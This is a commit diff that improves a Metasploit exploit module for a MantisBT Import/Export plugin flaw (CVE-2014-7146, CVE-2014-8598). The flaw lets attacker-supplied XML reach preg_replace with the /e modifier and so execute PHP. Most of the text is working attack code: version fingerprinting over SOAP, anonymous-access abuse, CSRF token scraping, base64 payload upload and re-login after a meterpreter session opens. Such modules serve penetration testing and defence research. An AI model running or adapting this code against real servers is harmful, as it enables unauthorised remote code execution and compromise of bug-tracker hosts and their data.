Land #4528, mantisbt_php_exec improvements
commit
ea793802cc
|
@ -9,6 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Rank = GreatRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include REXML
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
@ -17,16 +18,22 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
This module exploits a post-auth vulnerability found in MantisBT versions 1.2.0a3 up to 1.2.17 when the Import/Export plugin is installed.
|
||||
The vulnerable code exists on plugins/XmlImportExport/ImportXml.php, which receives user input through the "description" field and the "issuelink" attribute of an uploaded XML file and passes to preg_replace() function with the /e modifier.
|
||||
This allows a remote authenticated attacker to execute arbitrary PHP code on the remote machine.
|
||||
This version also suffers from another issue. The import page is not checking the correct user level
|
||||
of the user, so it's possible to exploit this issue with any user including the anonymous one if enabled.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Egidio Romano', # discovery http://karmainsecurity.com
|
||||
'Juan Escobar <eng.jescobar[at]gmail.com>', # module development @itsecurityco
|
||||
'Christian Mehlmauer'
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2014-7146']
|
||||
['CVE', '2014-7146'],
|
||||
['CVE', '2014-8598'],
|
||||
['URL', 'https://www.mantisbt.org/bugs/view.php?id=17725'],
|
||||
['URL', 'https://www.mantisbt.org/bugs/view.php?id=17780']
|
||||
],
|
||||
'Platform' => 'php',
|
||||
'Arch' => ARCH_PHP,
|
||||
|
@ -42,18 +49,70 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
res = exec_php('phpinfo(); die();', true)
|
||||
def get_mantis_version
|
||||
xml = Document.new
|
||||
xml.add_element(
|
||||
"soapenv:Envelope",
|
||||
{
|
||||
'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance",
|
||||
'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema",
|
||||
'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/",
|
||||
'xmlns:man' => "http://futureware.biz/mantisconnect"
|
||||
})
|
||||
xml.root.add_element("soapenv:Header")
|
||||
xml.root.add_element("soapenv:Body")
|
||||
body = xml.root.elements[2]
|
||||
body.add_element("man:mc_version",
|
||||
{ 'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/" }
|
||||
)
|
||||
|
||||
if res && res.body =~ /This program makes use of the Zend/
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'api', 'soap', 'mantisconnect.php'),
|
||||
'ctype' => 'text/xml; charset=UTF-8',
|
||||
'headers' => { 'SOAPAction' => 'http://www.mantisbt.org/bugs/api/soap/mantisconnect.php/mc_version'},
|
||||
'data' => xml.to_s
|
||||
})
|
||||
if res && res.code == 200
|
||||
match = res.body.match(/<ns1:mc_versionResponse.*><return xsi:type="xsd:string">(.+)<\/return><\/ns1:mc_versionResponse>/)
|
||||
if match && match.length == 2
|
||||
version = match[1]
|
||||
print_status("Detected Mantis version #{version}")
|
||||
return version
|
||||
end
|
||||
end
|
||||
|
||||
print_status("Can not detect Mantis version")
|
||||
return nil
|
||||
end
|
||||
|
||||
def check
|
||||
version = get_mantis_version
|
||||
|
||||
return Exploit::CheckCode::Unknown if version.nil?
|
||||
|
||||
gem_version = Gem::Version.new(version)
|
||||
gem_version_introduced = Gem::Version.new('1.2.0a3')
|
||||
gem_version_fixed = Gem::Version.new('1.2.18')
|
||||
|
||||
if gem_version < gem_version_fixed && gem_version >= gem_version_introduced
|
||||
return Msf::Exploit::CheckCode::Appears
|
||||
else
|
||||
return Exploit::CheckCode::Unknown
|
||||
return Msf::Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
|
||||
def do_login()
|
||||
print_status('Checking access to MantisBT...')
|
||||
# check for anonymous login
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'login_anon.php')
|
||||
})
|
||||
# if the redirect contains a username (non empty), anonymous access is enabled
|
||||
if res && res.redirect? && res.redirection && res.redirection.query =~ /username=[^&]+/
|
||||
print_status('Anonymous access enabled, no need to log in')
|
||||
session_cookie = res.get_cookies
|
||||
else
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'login_page.php'),
|
||||
|
@ -61,11 +120,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'return' => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import')
|
||||
}
|
||||
})
|
||||
|
||||
fail_with(Failure::NoAccess, 'Error accessing MantisBT') unless res && res.code == 200
|
||||
|
||||
session_cookie = res.get_cookies
|
||||
|
||||
print_status('Logging in...')
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
|
@ -78,13 +133,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'secure_session' => 'on'
|
||||
}
|
||||
})
|
||||
|
||||
|
||||
fail_with(Failure::NoAccess, 'Login failed') unless res && res.code == 302
|
||||
|
||||
fail_with(Failure::NoAccess, 'Wrong credentials') unless res.redirection.to_s !~ /login_page.php/
|
||||
fail_with(Failure::NoAccess, 'Wrong credentials') unless res && !res.redirection.to_s.include?('login_page.php')
|
||||
|
||||
"#{session_cookie} #{res.get_cookies}"
|
||||
session_cookie = "#{session_cookie} #{res.get_cookies}"
|
||||
end
|
||||
|
||||
session_cookie
|
||||
end
|
||||
|
||||
def upload_xml(payload_b64, rand_text, cookies, is_check)
|
||||
|
@ -107,11 +163,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
}
|
||||
})
|
||||
|
||||
unless res && res.code == 200
|
||||
unless res && res.code == 200 && res.body
|
||||
print_error('Error trying to access XmlImportExport/import page...')
|
||||
return false
|
||||
end
|
||||
|
||||
if res.body.include?('Plugin is not registered with MantisBT')
|
||||
print_error('XMLImportExport plugin is not installed')
|
||||
return false
|
||||
end
|
||||
|
||||
# Retrieving CSRF token
|
||||
if res.body =~ /name="plugin_xml_import_action_token" value="(.*)"/
|
||||
csrf_token = Regexp.last_match[1]
|
||||
|
@ -190,22 +251,37 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
data_post = data.to_s
|
||||
|
||||
print_status('Sending payload...')
|
||||
return send_request_cgi({
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import_action'),
|
||||
'cookie' => cookies,
|
||||
'ctype' => "multipart/form-data; boundary=#{ data.bound }",
|
||||
'data' => data_post
|
||||
}, timeout)
|
||||
|
||||
if res && res.body && res.body.include?('APPLICATION ERROR')
|
||||
print_error('Error on uploading XML')
|
||||
return false
|
||||
end
|
||||
|
||||
# request above will time out and return nil on success
|
||||
return true
|
||||
end
|
||||
|
||||
def exec_php(php_code, is_check = false)
|
||||
print_status('Checking access to MantisBT...')
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path)
|
||||
})
|
||||
|
||||
fail_with(Failure::NoAccess, 'Error accessing MantisBT') unless res && (res.code == 200 || res.redirection)
|
||||
|
||||
# remove comments, line breaks and spaces of php_code
|
||||
payload_clean = php_code.gsub(/(\s+)|(#.*)/, '')
|
||||
|
||||
# clean b64 payload
|
||||
while Rex::Text.encode_base64(payload_clean) =~ /=/
|
||||
while Rex::Text.encode_base64(payload_clean).include?('=')
|
||||
payload_clean = "#{ payload_clean } "
|
||||
end
|
||||
payload_b64 = Rex::Text.encode_base64(payload_clean)
|
||||
|
@ -216,6 +292,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
res_payload = upload_xml(payload_b64, rand_text, cookies, is_check)
|
||||
|
||||
return unless res_payload
|
||||
|
||||
# When a meterpreter session is active, communication with the application is lost.
|
||||
# Must login again in order to recover the communication. Thanks to @FireFart for figure out how to fix it.
|
||||
cookies = do_login()
|
||||
|
@ -283,6 +361,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
get_mantis_version
|
||||
unless exec_php(payload.encoded)
|
||||
fail_with(Failure::Unknown, 'Exploit failed, aborting.')
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue